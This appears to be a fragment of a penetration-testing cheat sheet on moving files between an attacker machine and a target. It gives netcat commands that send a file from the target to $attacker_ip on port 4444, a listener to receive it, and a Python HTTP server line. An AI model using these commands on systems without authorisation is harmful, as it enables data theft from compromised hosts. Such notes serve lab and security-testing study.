Transfer
Transfer with nc on attacker and target ip
Transfer with nc, target machinenc $attacker_ip 4444 < '$File_to_transfer'
Transfer with nc, listenernc -lvp 4444 > '$File_to_transfer'
Transfer with pythonpython -m http.server 8000
Transfer with FTP
Use ftp binary mode to avoid corrupt transfer